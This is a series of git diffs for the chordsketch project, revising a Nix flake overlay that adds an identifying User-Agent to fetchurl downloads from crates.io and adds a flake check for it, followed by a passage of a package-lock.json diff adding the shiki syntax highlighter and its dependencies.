         + "(+https://github.com/koedame/chordsketch)";
 
-      identifiedFetchurlOverlay = final: prev: {
-        # Rebuild `fetchurl` via `lib.extendMkDerivation` (the
-        # constructor nixpkgs itself uses), wrapping the original
-        # `extendDrvArgs` so the resulting derivation args always
-        # carry an identifying `--user-agent` in `curlOptsList`.
-        # Preserves the original attribute-set shape that
-        # `lib/customisation.nix` and downstream `nixpkgs` code
-        # introspect on (`__functor`, `__functionArgs`,
-        # `constructDrv`, `extendDrvArgs`, `override`, ...).
-        fetchurl = final.lib.extendMkDerivation {
-          inherit (prev.fetchurl) constructDrv excludeDrvArgNames;
-          inheritFunctionArgs = false;
-          extendDrvArgs = finalAttrs: drvArgs:
-            let orig = prev.fetchurl.extendDrvArgs finalAttrs drvArgs;
-            in orig // {
-              curlOptsList =
-                (orig.curlOptsList or [ ])
-                ++ [ "--user-agent" cratesIoUserAgent ];
-            };
-        } // {
-          inherit (prev.fetchurl) resolveUrl;
+      # Assert the shape we depend on at evaluation time so a
+      # future nixpkgs refactor that renames `extendDrvArgs` etc.
+      # fails loudly instead of silently no-opping the overlay
+      # (silent failure → `nix build` would 403 again with no
+      # obvious cause). The asserts only evaluate when the
+      # overlay is applied, which happens for every output the
+      # flake produces.
+      assertFetchurlShape = fu:
+        assert (fu ? extendDrvArgs)
+          || throw "identifiedFetchurlOverlay: prev.fetchurl is missing `extendDrvArgs` — nixpkgs API may have changed";
+        assert (fu ? constructDrv)
+          || throw "identifiedFetchurlOverlay: prev.fetchurl is missing `constructDrv` — nixpkgs API may have changed";
+        assert (fu ? resolveUrl)
+          || throw "identifiedFetchurlOverlay: prev.fetchurl is missing `resolveUrl` — nixpkgs API may have changed";
+        fu;
+
+      identifiedFetchurlOverlay = final: prev:
+        let
+          fu = assertFetchurlShape prev.fetchurl;
+        in
+        {
+          # Rebuild `fetchurl` via `lib.extendMkDerivation` (the
+          # constructor nixpkgs itself uses) so the resulting
+          # functor-attrset has the same shape as the original;
+          # only `extendDrvArgs` is wrapped, to append our UA to
+          # `curlOptsList`. The builder's built-in
+          # `--user-agent "curl/<v> Nixpkgs/<v>"` flag is emitted
+          # BEFORE the user-supplied `curlOptsList`, so curl's
+          # last-flag-wins rule (see `man curl`) means our
+          # appended flag overrides the built-in one without
+          # needing to strip it.
+          fetchurl = final.lib.extendMkDerivation {
+            inherit (fu) constructDrv excludeDrvArgNames;
+            inheritFunctionArgs = false;
+            extendDrvArgs = finalAttrs: drvArgs:
+              let
+                orig = fu.extendDrvArgs finalAttrs drvArgs;
+                # Safe default: absent `curlOptsList` in `orig`
+                # means no pre-existing flags from the original
+                # extendDrvArgs result. If a caller already
+                # passed `--user-agent` in their own
+                # curlOptsList, our append still wins (curl uses
+                # the last `--user-agent` flag).
+                baseOpts = orig.curlOptsList or [ ];
+              in orig // {
+                curlOptsList =
+                  baseOpts ++ [ "--user-agent" cratesIoUserAgent ];
+              };
+          } // {
+            # `resolveUrl` is a non-standard attribute added by
+            # the downstream nixpkgs fetchurl wrapper (used by
+            # `mirror://` resolution); `extendMkDerivation` does
+            # not reconstruct it, so stitch it back in.
+            inherit (fu) resolveUrl;
+          };
         };
-      };
     in {
       packages = forEachSystem (pkgs: rec {
         # Build the `chordsketch` CLI from the Cargo workspace.
@@ -124,5 +172,38 @@
           ];
         };
       });
+
+      # `nix flake check`-discoverable assertions. Currently scoped to
+      # pinning the User-Agent overlay so a refactor that silently
+      # drops the `--user-agent` flag fails the check explicitly
+      # rather than relying on crates.io reproducing the 403 to
+      # surface the regression.
+      checks = forEachSystem (pkgs:
+        let
+          # Instantiate a representative fetchurl derivation; the
+          # `curlOptsList` attribute is computed eagerly by
+          # `extendDrvArgs` at evaluation time, so we can inspect
+          # it without performing a fetch.
+          probe = pkgs.fetchurl {
+            url = "https://example.invalid/probe.tar.gz";
+            # Any valid-shape sha256 works; we never fetch.
+            sha256 = pkgs.lib.fakeSha256;
+          };
+          opts = probe.curlOptsList or [ ];
+          hasUserAgent = pkgs.lib.elem "--user-agent" opts;
+          hasIdentifier =
+            pkgs.lib.any
+              (s: pkgs.lib.isString s
+                && pkgs.lib.hasInfix "chordsketch/" s)
+              opts;
+        in
+        {
+          fetchurl-ua-injected =
+            assert hasUserAgent
+              || throw "identifiedFetchurlOverlay: --user-agent flag missing from curlOptsList";
+            assert hasIdentifier
+              || throw "identifiedFetchurlOverlay: chordsketch/<v> identifier missing from curlOptsList";
+            pkgs.runCommand "fetchurl-ua-injected" { } "echo ok > $out";
+        });
     };
 }

--- a/flake.nix
+++ b/flake.nix
@@ -8,7 +8,7 @@
   # The input is pinned to a specific nixpkgs commit and the resolved
   # metadata is recorded in flake.lock for fully reproducible builds.
   # When bumping nixpkgs, update this SHA and run `nix flake update`.
-  inputs.nixpkgs.url = "github:NixOS/nixpkgs/4c1018dae018162ec878d42fec712642d214fdfa"; # nixos-unstable 2026-04-09
+  inputs.nixpkgs.url = "github:NixOS/nixpkgs/64c08a7ca051951c8eae34e3e3cb1e202fe36786"; # nixos-unstable 2026-05-23
 
   outputs = { self, nixpkgs }:
     let
@@ -20,13 +20,65 @@
         "aarch64-darwin"
       ];
 
-      # Evaluate `f pkgs` for each system in `systems`.
+      # Evaluate `f pkgs` for each system in `systems`, with the
+      # crates.io-compliant User-Agent overlay applied.
       forEachSystem = f:
         nixpkgs.lib.genAttrs systems
-          (system: f (import nixpkgs { inherit system; }));
+          (system: f (import nixpkgs {
+            inherit system;
+            overlays = [ identifiedFetchurlOverlay ];
+          }));
 
       # Read version from the CLI crate so it stays in sync automatically.
       cliCargoToml = builtins.fromTOML (builtins.readFile ./crates/cli/Cargo.toml);
+      cliVersion = cliCargoToml.package.version;
+
+      # crates.io's data-access policy
+      # (https://crates.io/data-access) rejects requests whose
+      # `User-Agent` does not uniquely identify the requester and
+      # provide a means of contact, returning HTTP 403 with a
+      # "violation of our API data access policy" message. The
+      # default `curl/<version>` UA that nixpkgs `fetchurl` sends
+      # was tightened to reject some time around 2026-05, so every
+      # `nix build` fails at the first crate download
+      # (`adobe-cmap-parser`) until we send an identifying UA.
+      #
+      # `fetchurl` in modern nixpkgs is an attribute set with a
+      # `__functor` (making it callable) and an `extendDrvArgs`
+      # helper purpose-built for layering extra derivation
+      # arguments. Use the helper directly so all of fetchurl's
+      # other attributes (`override`, `overrideDerivation`,
+      # `__functionArgs`, etc.) remain intact — a plain `args:
+      # prev.fetchurl args` replacement would strip them and break
+      # downstream consumers that do attribute access on
+      # `pkgs.fetchurl`.
+      cratesIoUserAgent =
+        "chordsketch/${cliVersion} "
+        + "(+https://github.com/koedame/chordsketch)";
+
+      identifiedFetchurlOverlay = final: prev: {
+        # Rebuild `fetchurl` via `lib.extendMkDerivation` (the
+        # constructor nixpkgs itself uses), wrapping the original
+        # `extendDrvArgs` so the resulting derivation args always
+        # carry an identifying `--user-agent` in `curlOptsList`.
+        # Preserves the original attribute-set shape that
+        # `lib/customisation.nix` and downstream `nixpkgs` code
+        # introspect on (`__functor`, `__functionArgs`,
+        # `constructDrv`, `extendDrvArgs`, `override`, ...).
+        fetchurl = final.lib.extendMkDerivation {
+          inherit (prev.fetchurl) constructDrv excludeDrvArgNames;
+          inheritFunctionArgs = false;
+          extendDrvArgs = finalAttrs: drvArgs:
+            let orig = prev.fetchurl.extendDrvArgs finalAttrs drvArgs;
+            in orig // {
+              curlOptsList =
+                (orig.curlOptsList or [ ])
+                ++ [ "--user-agent" cratesIoUserAgent ];
+            };
+        } // {
+          inherit (prev.fetchurl) resolveUrl;
+        };
+      };
     in {
       packages = forEachSystem (pkgs: rec {
         # Build the `chordsketch` CLI from the Cargo workspace.

--- a/flake.nix
+++ b/flake.nix
@@ -83,6 +83,8 @@
           || throw "identifiedFetchurlOverlay: prev.fetchurl is missing `extendDrvArgs` — nixpkgs API may have changed";
         assert (fu ? constructDrv)
           || throw "identifiedFetchurlOverlay: prev.fetchurl is missing `constructDrv` — nixpkgs API may have changed";
+        assert (fu ? excludeDrvArgNames)
+          || throw "identifiedFetchurlOverlay: prev.fetchurl is missing `excludeDrvArgNames` — nixpkgs API may have changed";
         assert (fu ? resolveUrl)
           || throw "identifiedFetchurlOverlay: prev.fetchurl is missing `resolveUrl` — nixpkgs API may have changed";
         fu;

--- a/flake.nix
+++ b/flake.nix
@@ -20,47 +20,13 @@
         "aarch64-darwin"
       ];
 
-      # Read version from the CLI crate so it stays in sync automatically.
-      cliCargoToml = builtins.fromTOML (builtins.readFile ./crates/cli/Cargo.toml);
-      cliVersion = cliCargoToml.package.version;
-
-      # crates.io's data-access policy (https://crates.io/data-access)
-      # rejects requests whose `User-Agent` does not uniquely identify
-      # the requester and provide a means of contact, returning HTTP
-      # 403 with a "violation of our API data access policy"
-      # message. The pinned nixpkgs (2026-04-09) sends only the
-      # default `curl/<version>` UA from `fetchurl`'s builder, which
-      # crates.io tightened to reject some time around 2026-05.
-      # `cargoLock.lockFile` below uses `fetchurl` for every crate
-      # tarball, so without this overlay every `nix build` fails at
-      # the first crate download.
-      #
-      # The overlay appends an identifying UA to every `fetchurl`
-      # invocation via `curlOptsList`. Affects all downloads in the
-      # nix store build (system fetches go through `fetchurlBoot`,
-      # which is unaffected), so the blast radius is bounded to
-      # source / artifact fetches the chordsketch derivation triggers.
-      cratesIoUserAgent =
-        "chordsketch/${cliVersion} "
-        + "(+https://github.com/koedame/chordsketch)";
-
-      identifiedFetchurlOverlay = final: prev: {
-        fetchurl = args:
-          prev.fetchurl (args // {
-            curlOptsList =
-              (args.curlOptsList or [ ])
-              ++ [ "--user-agent" cratesIoUserAgent ];
-          });
-      };
-
-      # Evaluate `f pkgs` for each system in `systems`, with the
-      # crates.io-compliant User-Agent overlay applied.
+      # Evaluate `f pkgs` for each system in `systems`.
       forEachSystem = f:
         nixpkgs.lib.genAttrs systems
-          (system: f (import nixpkgs {
-            inherit system;
-            overlays = [ identifiedFetchurlOverlay ];
-          }));
+          (system: f (import nixpkgs { inherit system; }));
+
+      # Read version from the CLI crate so it stays in sync automatically.
+      cliCargoToml = builtins.fromTOML (builtins.readFile ./crates/cli/Cargo.toml);
     in {
       packages = forEachSystem (pkgs: rec {
         # Build the `chordsketch` CLI from the Cargo workspace.

--- a/flake.nix
+++ b/flake.nix
@@ -20,13 +20,47 @@
         "aarch64-darwin"
       ];
 
-      # Evaluate `f pkgs` for each system in `systems`.
-      forEachSystem = f:
-        nixpkgs.lib.genAttrs systems
-          (system: f (import nixpkgs { inherit system; }));
-
       # Read version from the CLI crate so it stays in sync automatically.
       cliCargoToml = builtins.fromTOML (builtins.readFile ./crates/cli/Cargo.toml);
+      cliVersion = cliCargoToml.package.version;
+
+      # crates.io's data-access policy (https://crates.io/data-access)
+      # rejects requests whose `User-Agent` does not uniquely identify
+      # the requester and provide a means of contact, returning HTTP
+      # 403 with a "violation of our API data access policy"
+      # message. The pinned nixpkgs (2026-04-09) sends only the
+      # default `curl/<version>` UA from `fetchurl`'s builder, which
+      # crates.io tightened to reject some time around 2026-05.
+      # `cargoLock.lockFile` below uses `fetchurl` for every crate
+      # tarball, so without this overlay every `nix build` fails at
+      # the first crate download.
+      #
+      # The overlay appends an identifying UA to every `fetchurl`
+      # invocation via `curlOptsList`. Affects all downloads in the
+      # nix store build (system fetches go through `fetchurlBoot`,
+      # which is unaffected), so the blast radius is bounded to
+      # source / artifact fetches the chordsketch derivation triggers.
+      cratesIoUserAgent =
+        "chordsketch/${cliVersion} "
+        + "(+https://github.com/koedame/chordsketch)";
+
+      identifiedFetchurlOverlay = final: prev: {
+        fetchurl = args:
+          prev.fetchurl (args // {
+            curlOptsList =
+              (args.curlOptsList or [ ])
+              ++ [ "--user-agent" cratesIoUserAgent ];
+          });
+      };
+
+      # Evaluate `f pkgs` for each system in `systems`, with the
+      # crates.io-compliant User-Agent overlay applied.
+      forEachSystem = f:
+        nixpkgs.lib.genAttrs systems
+          (system: f (import nixpkgs {
+            inherit system;
+            overlays = [ identifiedFetchurlOverlay ];
+          }));
     in {
       packages = forEachSystem (pkgs: rec {
         # Build the `chordsketch` CLI from the Cargo workspace.

--- a/flake.nix
+++ b/flake.nix
@@ -44,17 +44,13 @@
         "chordsketch/${cliVersion} "
         + "(+https://github.com/koedame/chordsketch)";
 
-      # Preserve `fetchurl.override` and other attributes by wrapping
-      # via `lib.makeOverridable` rather than replacing the function
-      # outright (a plain lambda has no `.override`, which trips
-      # downstream consumers that introspect `pkgs.fetchurl`).
       identifiedFetchurlOverlay = final: prev: {
-        fetchurl = final.lib.makeOverridable (args:
+        fetchurl = args:
           prev.fetchurl (args // {
             curlOptsList =
               (args.curlOptsList or [ ])
               ++ [ "--user-agent" cratesIoUserAgent ];
-          }));
+          });
       };
 
       # Evaluate `f pkgs` for each system in `systems`, with the

--- a/flake.nix
+++ b/flake.nix
@@ -44,13 +44,17 @@
         "chordsketch/${cliVersion} "
         + "(+https://github.com/koedame/chordsketch)";
 
+      # Preserve `fetchurl.override` and other attributes by wrapping
+      # via `lib.makeOverridable` rather than replacing the function
+      # outright (a plain lambda has no `.override`, which trips
+      # downstream consumers that introspect `pkgs.fetchurl`).
       identifiedFetchurlOverlay = final: prev: {
-        fetchurl = args:
+        fetchurl = final.lib.makeOverridable (args:
           prev.fetchurl (args // {
             curlOptsList =
               (args.curlOptsList or [ ])
               ++ [ "--user-agent" cratesIoUserAgent ];
-          });
+          }));
       };
 
       # Evaluate `f pkgs` for each system in `systems`, with the

--- a/packages/playground/package-lock.json
+++ b/packages/playground/package-lock.json
@@ -26,6 +26,7 @@
         "react": "^18.3.1",
         "react-dom": "^18.3.1",
         "react-grab": "^0.1.33",
+        "shiki": "^4.1.0",
         "typescript": "^5.7.0",
         "vite": "^6.0.0",
         "vitest": "^2.1.8"
@@ -1494,6 +1495,114 @@
         "win32"
       ]
     },
+    "node_modules/@shikijs/core": {
+      "version": "4.1.0",
+      "resolved": "https://registry.npmjs.org/@shikijs/core/-/core-4.1.0.tgz",
+      "integrity": "sha512-jLJtSJeuFffqX6/inRE1zqU5aFv2hrszvYgq3OjbAgFRZiWv7abKMDdQzYxuSDfmUPQozZvI/kuy6VMTvnvqTQ==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@shikijs/primitive": "4.1.0",
+        "@shikijs/types": "4.1.0",
+        "@shikijs/vscode-textmate": "^10.0.2",
+        "@types/hast": "^3.0.4",
+        "hast-util-to-html": "^9.0.5"
+      },
+      "engines": {
+        "node": ">=20"
+      }
+    },
+    "node_modules/@shikijs/engine-javascript": {
+      "version": "4.1.0",
+      "resolved": "https://registry.npmjs.org/@shikijs/engine-javascript/-/engine-javascript-4.1.0.tgz",
+      "integrity": "sha512-YquhawCUgaBfhsS72e2Y/dI59gCBNPHu3fEO/tvLaXrTssxZrY5ddjtNLTwndrMgPo8b3IscE+xoICDzpTmlFQ==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@shikijs/types": "4.1.0",
+        "@shikijs/vscode-textmate": "^10.0.2",
+        "oniguruma-to-es": "^4.3.6"
+      },
+      "engines": {
+        "node": ">=20"
+      }
+    },
+    "node_modules/@shikijs/engine-oniguruma": {
+      "version": "4.1.0",
+      "resolved": "https://registry.npmjs.org/@shikijs/engine-oniguruma/-/engine-oniguruma-4.1.0.tgz",
+      "integrity": "sha512-axLpjVs45YBvvINa+dJF+NPW+KtFkNXsFr4SDw2BMj9GdeMnGxVB9PQb2xXlJYovslt/nz6giedAyOANkfc7hg==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@shikijs/types": "4.1.0",
+        "@shikijs/vscode-textmate": "^10.0.2"
+      },
+      "engines": {
+        "node": ">=20"
+      }
+    },
+    "node_modules/@shikijs/langs": {
+      "version": "4.1.0",
+      "resolved": "https://registry.npmjs.org/@shikijs/langs/-/langs-4.1.0.tgz",
+      "integrity": "sha512-nwOMruEkbgdZfQ/b8CgpNBVOpvG1k0N5tbmgiFeqsan401+x3ILqlzZJowSla4Agmq4hG2Uf2wh5jLTEhR8VSg==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@shikijs/types": "4.1.0"
+      },
+      "engines": {
+        "node": ">=20"
+      }
+    },
+    "node_modules/@shikijs/primitive": {
+      "version": "4.1.0",
+      "resolved": "https://registry.npmjs.org/@shikijs/primitive/-/primitive-4.1.0.tgz",
+      "integrity": "sha512-zx2/2Uwj2q9X3KSyYREEhXO23xBw5WUhP4orK2lE4r+t9JGITmEe0JH+wPmJhqHpOT2bRRs6lAL945+LDvOAGw==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@shikijs/types": "4.1.0",
+        "@shikijs/vscode-textmate": "^10.0.2",
+        "@types/hast": "^3.0.4"
+      },
+      "engines": {
+        "node": ">=20"
+      }
+    },
+    "node_modules/@shikijs/themes": {
+      "version": "4.1.0",
+      "resolved": "https://registry.npmjs.org/@shikijs/themes/-/themes-4.1.0.tgz",
+      "integrity": "sha512-emCcTnUM7yO2wltYbaxm+yLvcCI4+h8XBKc4KmJ7EZUXoSGjcCHifkI//R4OFit9ewpg7H2/9tjOuXrT2v/Knw==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@shikijs/types": "4.1.0"
+      },
+      "engines": {
+        "node": ">=20"
+      }
+    },
+    "node_modules/@shikijs/types": {
+      "version": "4.1.0",
+      "resolved": "https://registry.npmjs.org/@shikijs/types/-/types-4.1.0.tgz",
+      "integrity": "sha512-3EQWX54fMpniOrDblzAhiwiJwpiTMW6+B9DWyUd9ska483tbayFYuw47UxwuPknI31bKnySfVQ/QW+jFL4rFdA==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@shikijs/vscode-textmate": "^10.0.2",
+        "@types/hast": "^3.0.4"
+      },
+      "engines": {
+        "node": ">=20"
+      }
+    },
+    "node_modules/@shikijs/vscode-textmate": {
+      "version": "10.0.2",
+      "resolved": "https://registry.npmjs.org/@shikijs/vscode-textmate/-/vscode-textmate-10.0.2.tgz",
+      "integrity": "sha512-83yeghZ2xxin3Nj8z1NMd/NCuca+gsYXswywDy5bHvwlWL8tpTQmzGeUuHd9FC3E/SBEMvzJRwWEOz5gGes9Qg==",
+      "dev": true,
+      "license": "MIT"
+    },
     "node_modules/@types/babel__core": {
       "version": "7.20.5",
       "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz",
@@ -1546,6 +1655,26 @@
       "dev": true,
       "license": "MIT"
     },
+    "node_modules/@types/hast": {
+      "version": "3.0.4",
+      "resolved": "https://registry.npmjs.org/@types/hast/-/hast-3.0.4.tgz",
+      "integrity": "sha512-WPs+bbQw5aCj+x6laNGWLH3wviHtoCv/P3+otBhbOhJgG8qtpdAMlTCxLtsTWA7LH1Oh/bFCHsBn0TPS5m30EQ==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/unist": "*"
+      }
+    },
+    "node_modules/@types/mdast": {
+      "version": "4.0.4",
+      "resolved": "https://registry.npmjs.org/@types/mdast/-/mdast-4.0.4.tgz",
+      "integrity": "sha512-kGaNbPh1k7AFzgpud/gMdvIm5xuECykRR+JnWKQno9TAXVa6WIVCGTPvYGekIDL4uwCZQSYbUxNBSb1aUo79oA==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/unist": "*"
+      }
+    },
     "node_modules/@types/node": {
       "version": "22.19.17",
       "resolved": "https://registry.npmjs.org/@types/node/-/node-22.19.17.tgz",
@@ -1591,6 +1720,20 @@
       "dev": true,
       "license": "MIT",
       "optional": true
+    },
+    "node_modules/@types/unist": {
+      "version": "3.0.3",
+      "resolved": "https://registry.npmjs.org/@types/unist/-/unist-3.0.3.tgz",
+      "integrity": "sha512-ko/gIFJRv177XgZsZcBwnqJN5x/Gien8qNOn0D5bQU/zAzVf9Zt3BlcUiLqhV9y4ARk0GbT3tnUiPNgnTXzc/Q==",
+      "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/@ungap/structured-clone": {
+      "version": "1.3.1",
+      "resolved": "https://registry.npmjs.org/@ungap/structured-clone/-/structured-clone-1.3.1.tgz",
+      "integrity": "sha512-mUFwbeTqrVgDQxFveS+df2yfap6iuP20NAKAsBt5jDEoOTDew+zwLAOilHCeQJOVSvmgCX4ogqIrA0mnyr08yQ==",
+      "dev": true,
+      "license": "ISC"
     },
     "node_modules/@vitejs/plugin-react": {
       "version": "4.7.0",
@@ -1841,6 +1984,17 @@
       ],
       "license": "CC-BY-4.0"
     },
+    "node_modules/ccount": {
+      "version": "2.0.1",
+      "resolved": "https://registry.npmjs.org/ccount/-/ccount-2.0.1.tgz",
+      "integrity": "sha512-eyrF0jiFpY+3drT6383f1qhkbGsLSifNAjA61IUjZjmLCWjItY6LB9ft9YhoDgwfmclB2zhu51Lc7+95b8NRAg==",
+      "dev": true,
+      "license": "MIT",
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/wooorm"
+      }
+    },
     "node_modules/chai": {
       "version": "5.3.3",
       "resolved": "https://registry.npmjs.org/chai/-/chai-5.3.3.tgz",
@@ -1869,6 +2023,28 @@
       },
       "funding": {
         "url": "https://github.com/chalk/chalk?sponsor=1"
+      }
+    },
+    "node_modules/character-entities-html4": {
+      "version": "2.1.0",
+      "resolved": "https://registry.npmjs.org/character-entities-html4/-/character-entities-html4-2.1.0.tgz",
+      "integrity": "sha512-1v7fgQRj6hnSwFpq1Eu0ynr/CDEw0rXo2B61qXrLNdHZmPKgb7fqS1a2JwF0rISo9q77jDI8VMEHoApn8qDoZA==",
+      "dev": true,
+      "license": "MIT",
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/wooorm"
+      }
+    },
+    "node_modules/character-entities-legacy": {
+      "version": "3.0.0",
+      "resolved": "https://registry.npmjs.org/character-entities-legacy/-/character-entities-legacy-3.0.0.tgz",
+      "integrity": "sha512-RpPp0asT/6ufRm//AJVwpViZbGM/MkjQFxJccQRHmISF/22NBtsHqAWmL+/pmkPWoIUJdWyeVleTl1wydHATVQ==",
+      "dev": true,
+      "license": "MIT",
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/wooorm"
       }
     },
     "node_modules/check-error": {
@@ -1937,6 +2113,17 @@
       },
       "engines": {
         "node": ">= 0.8"
+      }
+    },
+    "node_modules/comma-separated-tokens": {
+      "version": "2.0.3",
+      "resolved": "https://registry.npmjs.org/comma-separated-tokens/-/comma-separated-tokens-2.0.3.tgz",
+      "integrity": "sha512-Fu4hJdvzeylCfQPp9SGWidpzrMs7tTrlu6Vb8XGaRGck8QSNZJJp538Wrb60Lax4fPwR64ViY468OIUTbRlGZg==",
+      "dev": true,
+      "license": "MIT",
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/wooorm"
       }
     },
     "node_modules/commander": {
@@ -2048,6 +2235,30 @@
       "license": "MIT",
       "engines": {
         "node": ">=0.4.0"
+      }
+    },
+    "node_modules/dequal": {
+      "version": "2.0.3",
+      "resolved": "https://registry.npmjs.org/dequal/-/dequal-2.0.3.tgz",
+      "integrity": "sha512-0je+qPKHEMohvfRTCEo3CrPG6cAzAYgmzKyxRiYSSDkS6eGJdyVJm7WaYA5ECaAD9wLB2T4EEeymA5aFVcYXCA==",
+      "dev": true,
+      "license": "MIT",
+      "engines": {
+        "node": ">=6"
+      }
+    },
+    "node_modules/devlop": {
+      "version": "1.1.0",
+      "resolved": "https://registry.npmjs.org/devlop/-/devlop-1.1.0.tgz",
+      "integrity": "sha512-RWmIqhcFf1lRYBvNmr7qTNuyCt/7/ns2jbpp1+PalgE/rDQcBT0fioSMUpJ93irlUhC5hrg4cYqe6U+0ImW0rA==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "dequal": "^2.0.0"
+      },
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/wooorm"
       }
     },
     "node_modules/dompurify": {
@@ -2407,6 +2618,44 @@
         "node": ">= 0.4"
       }
     },
+    "node_modules/hast-util-to-html": {
+      "version": "9.0.5",
+      "resolved": "https://registry.npmjs.org/hast-util-to-html/-/hast-util-to-html-9.0.5.tgz",
+      "integrity": "sha512-OguPdidb+fbHQSU4Q4ZiLKnzWo8Wwsf5bZfbvu7//a9oTYoqD/fWpe96NuHkoS9h0ccGOTe0C4NGXdtS0iObOw==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/hast": "^3.0.0",
+        "@types/unist": "^3.0.0",
+        "ccount": "^2.0.0",
+        "comma-separated-tokens": "^2.0.0",
+        "hast-util-whitespace": "^3.0.0",
+        "html-void-elements": "^3.0.0",
+        "mdast-util-to-hast": "^13.0.0",
+        "property-information": "^7.0.0",
+        "space-separated-tokens": "^2.0.0",
+        "stringify-entities": "^4.0.0",
+        "zwitch": "^2.0.4"
+      },
+      "funding": {
+        "type": "opencollective",
+        "url": "https://opencollective.com/unified"
+      }
+    },
+    "node_modules/hast-util-whitespace": {
+      "version": "3.0.0",
+      "resolved": "https://registry.npmjs.org/hast-util-whitespace/-/hast-util-whitespace-3.0.0.tgz",
+      "integrity": "sha512-88JUN06ipLwsnv+dVn+OIYOvAuvBMy/Qoi6O7mQHxdPXpjy+Cd6xRkWwux7DKO+4sYILtLBRIKgsdpS2gQc7qw==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/hast": "^3.0.0"
+      },
+      "funding": {
+        "type": "opencollective",
+        "url": "https://opencollective.com/unified"
+      }
+    },
     "node_modules/html-encoding-sniffer": {
       "version": "4.0.0",
       "resolved": "https://registry.npmjs.org/html-encoding-sniffer/-/html-encoding-sniffer-4.0.0.tgz",
@@ -2418,6 +2667,17 @@
       },
       "engines": {
         "node": ">=18"
+      }
+    },
+    "node_modules/html-void-elements": {
+      "version": "3.0.0",
+      "resolved": "https://registry.npmjs.org/html-void-elements/-/html-void-elements-3.0.0.tgz",
+      "integrity": "sha512-bEqo66MRXsUGxWHV5IP0PUiAWwoEjba4VCzg0LjFJBpchPaTfyfCKTG6bc5F8ucKec3q5y6qOdGyYTSBEvhCrg==",
+      "dev": true,
+      "license": "MIT",
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/wooorm"
       }
     },
     "node_modules/http-proxy-agent": {
@@ -2672,6 +2932,122 @@
         "node": ">= 0.4"
       }
     },
+    "node_modules/mdast-util-to-hast": {
+      "version": "13.2.1",
+      "resolved": "https://registry.npmjs.org/mdast-util-to-hast/-/mdast-util-to-hast-13.2.1.tgz",
+      "integrity": "sha512-cctsq2wp5vTsLIcaymblUriiTcZd0CwWtCbLvrOzYCDZoWyMNV8sZ7krj09FSnsiJi3WVsHLM4k6Dq/yaPyCXA==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/hast": "^3.0.0",
+        "@types/mdast": "^4.0.0",
+        "@ungap/structured-clone": "^1.0.0",
+        "devlop": "^1.0.0",
+        "micromark-util-sanitize-uri": "^2.0.0",
+        "trim-lines": "^3.0.0",
+        "unist-util-position": "^5.0.0",
+        "unist-util-visit": "^5.0.0",
+        "vfile": "^6.0.0"
+      },
+      "funding": {
+        "type": "opencollective",
+        "url": "https://opencollective.com/unified"
+      }
+    },
+    "node_modules/micromark-util-character": {
+      "version": "2.1.1",
+      "resolved": "https://registry.npmjs.org/micromark-util-character/-/micromark-util-character-2.1.1.tgz",
+      "integrity": "sha512-wv8tdUTJ3thSFFFJKtpYKOYiGP2+v96Hvk4Tu8KpCAsTMs6yi+nVmGh1syvSCsaxz45J6Jbw+9DD6g97+NV67Q==",
+      "dev": true,
+      "funding": [
+        {
+          "type": "GitHub Sponsors",
+          "url": "https://github.com/sponsors/unifiedjs"
+        },
+        {
+          "type": "OpenCollective",
+          "url": "https://opencollective.com/unified"
+        }
+      ],
+      "license": "MIT",
+      "dependencies": {
+        "micromark-util-symbol": "^2.0.0",
+        "micromark-util-types": "^2.0.0"
+      }
+    },
+    "node_modules/micromark-util-encode": {
+      "version": "2.0.1",
+      "resolved": "https://registry.npmjs.org/micromark-util-encode/-/micromark-util-encode-2.0.1.tgz",
+      "integrity": "sha512-c3cVx2y4KqUnwopcO9b/SCdo2O67LwJJ/UyqGfbigahfegL9myoEFoDYZgkT7f36T0bLrM9hZTAaAyH+PCAXjw==",
+      "dev": true,
+      "funding": [
+        {
+          "type": "GitHub Sponsors",
+          "url": "https://github.com/sponsors/unifiedjs"
+        },
+        {
+          "type": "OpenCollective",
+          "url": "https://opencollective.com/unified"
+        }
+      ],
+      "license": "MIT"
+    },
+    "node_modules/micromark-util-sanitize-uri": {
+      "version": "2.0.1",
+      "resolved": "https://registry.npmjs.org/micromark-util-sanitize-uri/-/micromark-util-sanitize-uri-2.0.1.tgz",
+      "integrity": "sha512-9N9IomZ/YuGGZZmQec1MbgxtlgougxTodVwDzzEouPKo3qFWvymFHWcnDi2vzV1ff6kas9ucW+o3yzJK9YB1AQ==",
+      "dev": true,
+      "funding": [
+        {
+          "type": "GitHub Sponsors",
+          "url": "https://github.com/sponsors/unifiedjs"
+        },
+        {
+          "type": "OpenCollective",
+          "url": "https://opencollective.com/unified"
+        }
+      ],
+      "license": "MIT",
+      "dependencies": {
+        "micromark-util-character": "^2.0.0",
+        "micromark-util-encode": "^2.0.0",
+        "micromark-util-symbol": "^2.0.0"
+      }
+    },
+    "node_modules/micromark-util-symbol": {
+      "version": "2.0.1",
+      "resolved": "https://registry.npmjs.org/micromark-util-symbol/-/micromark-util-symbol-2.0.1.tgz",
+      "integrity": "sha512-vs5t8Apaud9N28kgCrRUdEed4UJ+wWNvicHLPxCa9ENlYuAY31M0ETy5y1vA33YoNPDFTghEbnh6efaE8h4x0Q==",
+      "dev": true,
+      "funding": [
+        {
+          "type": "GitHub Sponsors",
